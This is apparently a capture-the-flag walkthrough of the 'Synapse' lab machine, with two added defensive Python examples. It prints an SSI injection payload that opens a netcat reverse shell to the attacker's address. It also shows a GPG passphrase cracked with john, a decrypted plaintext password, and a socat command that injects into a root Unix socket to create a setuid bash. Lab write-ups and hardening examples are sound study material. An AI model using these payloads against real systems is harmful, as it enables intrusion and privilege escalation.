Synapse
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 3000 -Pn 192.168.201.149
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-15 12:30 +08
Nmap scan report for 192.168.201.149
Host is up (0.17s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
SMB + FTP Rabbit Holes
FTP doesn't accept anonymous logins, and SMB with no credentials doesn't show us any share that we can access:
$ smbmap -H 192.168.201.149
[+] IP: 192.168.201.149:445 Name: 192.168.201.149
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (Samba 4.9.5-Debian)
It is thus likely that the way in is through the web application, so we can start proxying traffic through Burp Suite.
Web Enum -> SSI Injection
Port 80 was running a custom dashboard:

The File Manager was running elFinder, but we cannot access it since we need administrative access:

I checked the user tab, and found that the user was called mindsflee:

All of the options were under construction, except for the rightmost one.

From my enumeration, this seems to be the most vulnerable point. I attempted to upload some PHP webshells, but it seems only images are allowed.

There was one weird part, which was the url=inspect.shtml portion, since I had never seen that before. Searching for shtml gives us results for Server Side Includes (SSI).

HackTricks has a page on SSI Injection that we can try. We can try some of the payloads:

If we follow the redirect, we get this:

We now have RCE on the machine, and we can easily get a reverse shell using this:
<!--#exec cmd='nc -c bash 192.168.45.189 21' -->
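A way to spot attempts like the one above in web server logs, as an added example that is not part of the original write-up: the function below parses Apache combined-format access log lines (constructed samples, not from this box), URL-decodes the request repeatedly to catch double encoding, and flags any SSI directive found in it. On the mitigation side, serving .shtml with Options IncludesNOEXEC disables the exec directive entirely, and user input should never be reflected into an SSI-processed page.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

# SSI directives that have no business appearing inside user-controlled input.
SSI_RE = re.compile(
    r'<!--\s*#\s*(?P<directive>exec|include|echo|config|set|printenv|fsize|flastmod)\b',
    re.IGNORECASE,
)


def decode_request(request):
    """URL-decode the request line until it stops changing (attackers double-encode)."""
    decoded = request
    for _ in range(3):
        new = unquote_plus(decoded)
        if new == decoded:
            break
        decoded = new
    return decoded


def find_ssi_attempts(log_lines):
    """Return (ip, directive, decoded_request) for each line whose request carries an SSI directive."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        decoded = decode_request(m.group("request"))
        d = SSI_RE.search(decoded)
        if d:
            hits.append((m.group("ip"), d.group("directive").lower(), decoded))
    return hits


# Constructed sample log lines (not from the box): one benign, one single-encoded, one double-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Jul/2023:12:31:02 +0800] "GET /inspect.shtml?url=inspect.shtml HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [15/Jul/2023:12:31:40 +0800] "GET /inspect.shtml?name=%3C!--%23echo+var%3D%22DATE_LOCAL%22+--%3E HTTP/1.1" 200 1610 "-" "curl/8.1"',
    '10.0.0.9 - - [15/Jul/2023:12:32:05 +0800] "GET /inspect.shtml?name=%253C!--%2523exec+cmd%253D%2522id%2522+--%253E HTTP/1.1" 200 1644 "-" "curl/8.1"',
]

if __name__ == "__main__":
    for ip, directive, req in find_ssi_attempts(SAMPLE_LOG):
        print("ALERT %s sent an SSI '%s' directive: %s" % (ip, directive, req))
```

Run over a real access log, the same function feeds an alert on the first hit; the decoded request is returned so the analyst sees the payload in the form the server would have parsed it.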

Privilege Escalation
GPG Creds -> Mindsflee Shell
Within the /home/mindsflee directory, there are some files of interest:
www-data@synapse:/home/mindsflee$ ls -la
total 32
drwxr-xr-x 3 mindsflee mindsflee 4096 Jun 10 2021 .
drwxr-xr-x 3 root root 4096 Jun 10 2021 ..
lrwxrwxrwx 1 root root 9 Jun 10 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mindsflee mindsflee 220 Jun 10 2021 .bash_logout
-rw-r--r-- 1 mindsflee mindsflee 3526 Jun 10 2021 .bashrc
drwxr-xr-x 2 root root 4096 Jun 14 2021 .gnupg
-rw-r--r-- 1 mindsflee mindsflee 807 Jun 10 2021 .profile
-rw-r--r-- 1 mindsflee mindsflee 33 Jul 15 00:29 local.txt
-rw-r--r-- 1 root root 2058 Jan 3 2021 synapse_commander.py
www-data@synapse:/home/mindsflee/.gnupg$ ls -la
total 20
drwxr-xr-x 2 root root 4096 Jun 14 2021 .
drwxr-xr-x 3 mindsflee mindsflee 4096 Jun 10 2021 ..
-rw-r--r-- 1 mindsflee mindsflee 5180 Jun 14 2021 creds.priv
-rw-r--r-- 1 mindsflee mindsflee 124 Jun 14 2021 creds.txt.gpg
The .gnupg directory contains a private key (creds.priv) and an encrypted file (creds.txt.gpg); since both are world-readable, www-data can copy them back to our machine and we can then try to decrypt the file. Using gpg, we can attempt to import the key, but it requires a passphrase. We can crack the passphrase using gpg2john and john:
$ gpg2john creds.priv > gpg_hash
$ john --show gpg_hash
mindsflee:qwertyuiop:::mindsflee::creds.priv
Using this, we can then import the key using gpg and decrypt the file:
$ gpg --import creds.priv
gpg: key 8ECE3C203E92BE79: "mindsflee" not changed
gpg: key 8ECE3C203E92BE79: secret key imported
gpg: Total number processed: 1
gpg: unchanged: 1
gpg: secret keys read: 1
gpg: secret keys unchanged: 1
$ gpg --output decrypted --decrypt creds.txt.gpg
gpg: AES256.CFB encrypted data
gpg: encrypted with 1 passphrase
$ cat decrypted
user: mindsflee
password: m1ndsfl33w1llc4tchy0u?
Using this password, we can su to mindsflee.

Sudo Privileges -> Socket Injection
The mindsflee user can use sudo with the Python script we found:
[sudo] password for mindsflee:
Matching Defaults entries for mindsflee on synapse:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mindsflee may run the following commands on synapse:
(root) /usr/bin/python /home/mindsflee/synapse_commander.py
Here's the content of the script:
import socket
import os, os.path, sys
import time
from collections import deque

# Python 2 script (bare print statements, raw_input); runs as root via sudo.
print("""\
_____ __ __ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ ____ _____ _____
| __| | | | | _ | _ | __| __| | | | | | _ | | | \| __| __ |
|__ |_ _| | | | | __|__ | __| | --| | | | | | | | | | | | | | | __| -|
|_____| |_| |_|___|__|__|__| |_____|_____| |_____|_____|_|_|_|_|_|_|__|__|_|___|____/|_____|__|__|
""")
print("Focus your approach with a system designed for single network port access.")
print ("With Synapse Commander, a single arm delivers three multi-jointed instruments")
print("and a fully wristed 3DHD camera for visibility and control in narrow surgical spaces.")
print("Streamlined setup, multiple control modes and a dynamic statistics display are included")
print
print("1 - Access to ARM management")
print("2 - Enable 3DHD camera")
print("3 - Settings")
print("4 - Reboot the system")
print
instruction = raw_input("Synapse Instruction:")
if instruction == "1":
    print ("\nARM MANAGEMENT ENABLED")
    os.system("touch 2343432445467676")
elif instruction == "2":
    print ("\n3DHD CAMERA ENABLED")
    os.system("touch 5344225453244546")
elif instruction == "3":
    print ("\nACCESS TO SETTINGS CONFIGURATION")
    os.system("touch 77756563456244546")
elif instruction == "4":
    print ("\nSYSTEM REBOOTED")
    os.execl(sys.executable, sys.executable, *sys.argv)  # re-executes the script from the start
else:
    os.execl(sys.executable, sys.executable, *sys.argv)  # any other input also restarts the script

# Options 1-3 fall through to here: a Unix socket is created as root ...
if os.path.exists("/tmp/synapse_commander.s"):
    os.remove("/tmp/synapse_commander.s")
server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server.bind("/tmp/synapse_commander.s")
os.system("chmod o+w /tmp/synapse_commander.s")  # ... made writable by every local user ...
while True:
    server.listen(1)
    conn, addr = server.accept()
    datagram = conn.recv(1024)
    if datagram:
        print(datagram)
        os.system(datagram)  # ... and whatever is received is run through a root shell
        conn.close()
This program opens a Unix socket at /tmp/synapse_commander.s as root after we input any number from 1 to 3 (option 4 and any other input just re-run the script), makes the socket world-writable, and runs whatever it receives through os.system().
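The script has three separate weaknesses: a world-writable socket, no check on who connects, and os.system() on raw input. As an added example (not the box's script or anyone else's code), here is how the same service looks hardened in Python 3: an exact-match allowlist of argv lists executed without a shell, the socket created 0600 via umask, and the connecting uid checked with SO_PEERCRED on Linux. The command names and marker-file paths are hypothetical stand-ins for the script's three touch targets; demo() runs the server in a thread and sends it one valid and one hostile message.

```python
import os
import socket
import struct
import subprocess
import tempfile
import threading
import time

MAX_MSG = 64  # command names are short; no reason to read 1024 bytes of caller input

def make_allowlist(state_dir):
    """Fixed argv lists, never shell strings; names and marker files are hypothetical
    stand-ins for the three 'touch' actions in synapse_commander.py."""
    return {
        b"arm": ["touch", os.path.join(state_dir, "arm_enabled")],
        b"camera": ["touch", os.path.join(state_dir, "camera_enabled")],
        b"settings": ["touch", os.path.join(state_dir, "settings")],
    }

def resolve_command(datagram, allowlist):
    """Exact-match lookup: b'arm; id' is not b'arm', so metacharacters never reach a shell."""
    return allowlist.get(datagram.strip().lower())

def peer_uid(conn):
    """uid of the connecting process via SO_PEERCRED (Linux); None where unavailable."""
    if not hasattr(socket, "SO_PEERCRED"):
        return None
    creds = conn.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED, struct.calcsize("3i"))
    _pid, uid, _gid = struct.unpack("3i", creds)
    return uid

def serve(sock_path, allowlist, allowed_uids, max_conns):
    """Accept max_conns connections, run only allowlisted commands from allowed uids,
    and return a list of (verdict, detail) so the behaviour can be checked."""
    if os.path.exists(sock_path):
        os.remove(sock_path)
    old_umask = os.umask(0o177)  # socket file is created 0600, the opposite of 'chmod o+w'
    server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        server.bind(sock_path)
    finally:
        os.umask(old_umask)
    server.listen(1)
    outcomes = []
    for _ in range(max_conns):
        conn, _addr = server.accept()
        with conn:
            uid = peer_uid(conn)
            if uid is not None and uid not in allowed_uids:
                outcomes.append(("rejected-uid", uid))
                conn.sendall(b"ERR uid\n")
                continue
            msg = conn.recv(MAX_MSG)
            argv = resolve_command(msg, allowlist)
            if argv is None:
                outcomes.append(("rejected-cmd", msg))
                conn.sendall(b"ERR unknown command\n")
                continue
            subprocess.run(argv, check=True)  # argv list, shell=False: the message is never shell-parsed
            outcomes.append(("ran", argv[0]))
            conn.sendall(b"OK\n")
    server.close()
    return outcomes

def send(sock_path, msg):
    """Client: connect (retrying until the server has bound), send one message, return the reply."""
    c = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    for _ in range(500):
        try:
            c.connect(sock_path)
            break
        except (FileNotFoundError, ConnectionRefusedError):
            time.sleep(0.01)
    c.sendall(msg)
    reply = c.recv(64)
    c.close()
    return reply

def demo():
    """Server in a thread; client sends one allowlisted message and one with shell metacharacters."""
    with tempfile.TemporaryDirectory() as d:
        sock_path = os.path.join(d, "commander.s")
        result = {}
        def run_server():
            result["outcomes"] = serve(sock_path, make_allowlist(d), {os.getuid()}, 2)
        t = threading.Thread(target=run_server)
        t.start()
        result["replies"] = [send(sock_path, b"arm"), send(sock_path, b"arm; id")]
        result["socket_mode"] = os.stat(sock_path).st_mode & 0o777
        t.join()
        result["marker_created"] = os.path.exists(os.path.join(d, "arm_enabled"))
    return result

if __name__ == "__main__":
    print(demo())
```

The important design choice is that the message selects an entry in a table rather than being interpreted; even if the socket permissions were later loosened, a connecting user could only trigger the three fixed actions. Checking the peer uid is the second layer, and the 0600 mode the first.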
Again, HackTricks has a page for this:
In one SSH session, run the Python script and input '1'. In another SSH session, run this command:
echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/synapse_commander.s
Once we enter '1', the script waits for data on the socket; the string that socat sends is passed straight to os.system(datagram), which results in RCE as root:

We can then easily get a root shell:
